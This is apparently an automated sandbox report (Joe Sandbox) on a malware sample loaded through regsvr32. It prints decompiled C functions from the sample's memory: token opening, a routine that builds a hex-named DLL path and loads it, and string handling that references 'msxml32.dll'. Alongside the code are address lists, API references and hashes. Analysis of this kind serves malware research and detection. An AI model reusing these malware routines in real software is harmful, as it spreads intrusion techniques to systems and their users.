							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































              0x00744166
              0x0074416b
              0x0074416f
              0x00744172
              0x00744172
              0x00744175
              0x0074417a
              0x0074417f
              0x00744182
              0x00744187
              0x0074418a
              0x00744190
              0x00744190
              0x0074419b
              0x0074419e
              0x007441a5
              0x007441aa
              0x00000000
              0x00000000
              0x007441b0
              0x007441b5
              0x007441b5
              0x007441ba
              0x007441c0
              0x007441ca
              0x007441cf
              0x007441d5
              0x007441f4
              0x007441f7
              0x00744202
              0x00744202
              0x00744202
              0x007441f9
              0x007441f9
              0x007441fb
              0x00000000
              0x007441fd
              0x007441fd
              0x007441fd
              0x007441fb
              0x0074420a
              0x0074420f
              0x00744214
              0x0074421a
              0x0074421e
              0x00744221
              0x00744224
              0x0074422a
              0x0074422f
              0x00744232
              0x00744238
              0x0074423d
              0x00744243
              0x00744249
              0x0074424e
              0x00744251
              0x00744256
              0x0074425a
              0x0074425e
              0x00744261
              0x00744264
              0x0074426d
              0x00744274
              0x00744277
              0x0074427a
              0x0074427f
              0x00744284
              0x00744287
              0x0074428a
              0x0074428a
              0x0074428e
              0x00744297
              0x0074429e
              0x007442a1
              0x007442a6
              0x007442ab
              0x007442ab
              0x007442ae
              0x007442b3
              0x00000000
              0x00000000
              0x007441d7
              0x007441d9
              0x007441e6
              0x00000000
              0x00000000
              0x007441e6
              0x007441d9
              0x00000000
              0x007441d5
              0x007442b9
              0x007442be
              0x007442c1
              0x007442c4
              0x0074436f
              0x0074436f
              0x007442ca
              0x007442ca
              0x007442ca
              0x007442cf
              0x007442f9
              0x007442fc
              0x007442fc
              0x00744301
              0x00744303
              0x00744305
              0x00744308
              0x0074430b
              0x00744313
              0x00744318
              0x00744318
              0x0074431e
              0x00744321
              0x00744324
              0x00744327
              0x00744329
              0x00744329
              0x0074432a
              0x0074432a
              0x00744327
              0x00744338
              0x0074433b
              0x0074433f
              0x00744344
              0x00744347
              0x0074434a
              0x0074434a
              0x0074434a
              0x0074434d
              0x0074434d
              0x00744350
              0x00744350
              0x007442d1
              0x007442d1
              0x007442e1
              0x007442e4
              0x007442e9
              0x007442e9
              0x007442ec
              0x007442ef
              0x007442f2
              0x007442f4
              0x007442f4
              0x00744353
              0x00744355
              0x00744358
              0x00744358
              0x0074435e
              0x00744362
              0x00744365
              0x00744367
              0x00744367
              0x00744378
              0x0074437a
              0x0074437a
              0x00744382
              0x00744390
              0x00744393
              0x00744395
              0x007443b5
              0x007443b5
              0x007443b8
              0x007443be
              0x007443bf
              0x007443c2
              0x007443c4
              0x007443c7
              0x007443ca
              0x007443cd
              0x007443d1
              0x007443d4
              0x007443d7
              0x007443da
              0x007443dc
              0x007443dc
              0x007443df
              0x007443e1
              0x007443e1
              0x007443e4
              0x007443e6
              0x007443e9
              0x007443f1
              0x007443f4
              0x007443f9
              0x007443f9
              0x007443ff
              0x00744402
              0x00744405
              0x00744407
              0x00744407
              0x00744408
              0x00744408
              0x00744413
              0x00744413
              0x00744413
              0x00744416
              0x00744419
              0x00744419
              0x0074441c
              0x0074441c
              0x007443df
              0x0074441f
              0x00744422
              0x00744425
              0x00744427
              0x0074442a
              0x0074442c
              0x0074442f
              0x00744432
              0x00744434
              0x00744437
              0x0074443f
              0x00744447
              0x0074444a
              0x0074444a
              0x0074444a
              0x0074444d
              0x0074444d
              0x0074444d
              0x00744450
              0x00744456
              0x00744458
              0x00744458
              0x0074445e
              0x00744464
              0x0074446d
              0x00744474
              0x00744476
              0x00744479
              0x00744479
              0x0074447c
              0x0074447c
              0x0074447f
              0x00744481
              0x00744484
              0x00744486
              0x007444a1
              0x007444a1
              0x007444a5
              0x007444a8
              0x007444ab
              0x007444ae
              0x007444c4
              0x007444c4
              0x007444c4
              0x007444b0
              0x007444b0
              0x007444b2
              0x007444b6
              0x007444b9
              0x00000000
              0x007444bb
              0x007444bb
              0x007444bd
              0x00000000
              0x007444bf
              0x007444bf
              0x007444bf
              0x007444bd
              0x007444b9
              0x007444c8
              0x007444cb
              0x007444d0
              0x007444da
              0x007444da
              0x007444da
              0x007444dd
              0x00744488
              0x00744488
              0x0074448a
              0x00744491
              0x00744491
              0x00744493
              0x00744495
              0x00744497
              0x0074449b
              0x0074449d
              0x0074449f
              0x00000000
              0x00000000
              0x0074449f
              0x0074449b
              0x0074448c
              0x0074448c
              0x0074448f
              0x00000000
              0x00000000
              0x0074448f
              0x0074448a
              0x007444e7
              0x007444e9
              0x007444e9
              0x007444f4
              0x00744397
              0x00744397
              0x0074439a
              0x00000000
              0x0074439c
              0x0074439c
              0x0074439e
              0x007443a2
              0x00000000
              0x007443a4
              0x007443a4
              0x007443a4
              0x007443a7
              0x00000000
              0x007443ab
              0x007443b4
              0x007443b4
              0x007443a7
              0x007443a2
              0x0074439a
              0x00744386
              0x0074438f
              0x0074438f

              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
              • Instruction ID: 5c79aa1b030fa4328cdd6423d85b96cd66c9f1ea9d1a96d16597c1d98f3fb7dc
              • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
              • Instruction Fuzzy Hash: 10D12375A00B049FCB24CF6DC8C4A6AB7E5FF88304B24892DE88ACB712D775E944DB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073C92F Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0073C92F(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x74f8d0; // 0xc2f8c0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






              0x0073c94e
              0x0073c980
              0x0073c980
              0x0073c950
              0x0073c95b
              0x0073c97c
              0x0073c97c
              0x0073c95d
              0x0073c967
              0x0073c97a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073c97a
              0x0073c95b
              0x0073c985

              APIs
              • GetCurrentThread.KERNEL32 ref: 0073C942
              • OpenThreadToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C949
              • GetLastError.KERNEL32(?,?,0073CA74,00000000,00730000), ref: 0073C950
              • OpenProcessToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C975
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: OpenThreadToken$CurrentErrorLastProcess
              • String ID:
              • API String ID: 1515895013-0
              • Opcode ID: c0ec55b7b121da5e5bf5176b449e14285ce18180ca36e612123ecec997ce5859
              • Instruction ID: 210b44f2bc2cac9d4c88915ca9dbc75ae4ee332875d4c9c3ce4144e58589787c
              • Opcode Fuzzy Hash: c0ec55b7b121da5e5bf5176b449e14285ce18180ca36e612123ecec997ce5859
              • Instruction Fuzzy Hash: 61F05E76A00209EFEB019BB4DD09FAA73ECFF09304F118462E642E7061D768F9008B64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073D309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E0073D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x74f8d4; // 0xc2fc00
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E00739F85(_t50, 0xb9d);
					_t66 =  *0x74f8d4; // 0xc2fc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00739FE4( &_v140, 0x40, L"%08x", E0073E34A(_t66 + 0xb0, E0073A5D0(_t66 + 0xb0), 0));
					_t20 =  *0x74f8d4; // 0xc2fc00
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E00739F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
					_t26 =  *0x74f8d4; // 0xc2fc00
					_t68 = E00739C50(_t26 + 0x1020);
					_v12 = _t68;
					E00738D9A( &_v8);
					_t32 =  *0x74f8d4; // 0xc2fc00
					_t34 = E00739C50(_t32 + 0x122a);
					 *0x74f9d4 = _t34;
					_t35 =  *0x74f8d0; // 0xc2f8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x74c9d8,  &_v140, ".", L"dll", 0, 0x74c9d8, _t25, 0x74c9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x74f9d4);
					 *0x74f9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0073F08E(0x74cbc4, _t60);
					}
					 *0x74f9d0 = _t38;
					E00738DDF( &_v12, 0xfffffffe);
					E00738F63( &_v140, 0, 0x80);
					if( *0x74f9d0 != 0) {
						goto L10;
					} else {
						E00738DDF(0x74f9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x74f9d0 == 0) {
						_t46 = E0074F908; // 0xc2fa00
						 *0x74f9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

























              0x0073d309
              0x0073d309
              0x0073d309
              0x0073d30c
              0x0073d318
              0x0073d318
              0x0073d323
              0x0073d33f
              0x0073d344
              0x0073d34d
              0x0073d34f
              0x0073d357
              0x0073d378
              0x0073d37d
              0x0073d382
              0x0073d38a
              0x0073d397
              0x0073d3a5
              0x0073d3b6
              0x0073d3bc
              0x0073d3bf
              0x0073d3d6
              0x0073d3e2
              0x0073d3ea
              0x0073d3f1
              0x0073d3f7
              0x0073d403
              0x0073d409
              0x0073d410
              0x0073d423
              0x0073d412
              0x0073d412
              0x0073d415
              0x0073d41b
              0x0073d420
              0x0073d425
              0x0073d430
              0x0073d442
              0x0073d454
              0x00000000
              0x0073d456
              0x0073d45d
              0x00000000
              0x0073d463
              0x0073d464
              0x0073d464
              0x0073d46b
              0x0073d46d
              0x0073d472
              0x0073d472
              0x0073d477
              0x0073d47b
              0x0073d47b

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad
              • String ID: %08x$dll
              • API String ID: 1029625771-2963171978
              • Opcode ID: 0136f09616c497c62d825acb2f6b235bebff038a0678fdf0810f4ed8f4cc6fed
              • Instruction ID: 402a8ccc1374a54681329d15f4a2746d4eb5c18fbe53b1034b301ae4746ceba7
              • Opcode Fuzzy Hash: 0136f09616c497c62d825acb2f6b235bebff038a0678fdf0810f4ed8f4cc6fed
              • Instruction Fuzzy Hash: 2F31B1B6A00244BBE710EB68EC4AF6A32ECEB45304F148137F514D7192DF7CAC408765
              Uniqueness

              Uniqueness Score: -1.00%

              Function 007436D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
              Download Yara Rule
              C-Code - Quality: 47%
              			E007436D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E007435EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0073A5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x74cf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x74cf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L00748995();
				return _t29 - _t22;
			}

















              0x007436d5
              0x007436e0
              0x007436e7
              0x007436ee
              0x007436f4
              0x007436fc
              0x007436fd
              0x007436ff
              0x00743704
              0x0074370c
              0x0074370c
              0x0074370f
              0x00743713
              0x00743706
              0x00743706
              0x0074370a
              0x0074370c
              0x00000000
              0x00000000
              0x0074370c
              0x0074370a
              0x0074371c
              0x00743725
              0x0074372a
              0x0074372d
              0x00743730
              0x00743733
              0x00743735
              0x00743735
              0x0074373b
              0x0074373e
              0x00743741
              0x00743744
              0x00743749
              0x0074374b
              0x0074374b
              0x00743751
              0x0074375d
              0x0074375f
              0x0074376b

              APIs
              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0074371C
              • _ftol2_sse.MSVCRT ref: 0074375F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: _ftol2_sselstrlen
              • String ID: msxml32.dll
              • API String ID: 1292649733-2051705522
              • Opcode ID: 2ac7925eeb67dee4144adbaccdcddcfc9f8d61023a96ec2f2c318914d7762f41
              • Instruction ID: 64453bd15d4b6e97919c20e7548e6dda69ed72fcdd9fa754caa2af986eae5f19
              • Opcode Fuzzy Hash: 2ac7925eeb67dee4144adbaccdcddcfc9f8d61023a96ec2f2c318914d7762f41
              • Instruction Fuzzy Hash: C5114C73A00249EBCF019F68EC450DE7F75FF55310F22855AE858C6242EB78C664C345
              Uniqueness

              Uniqueness Score: -1.00%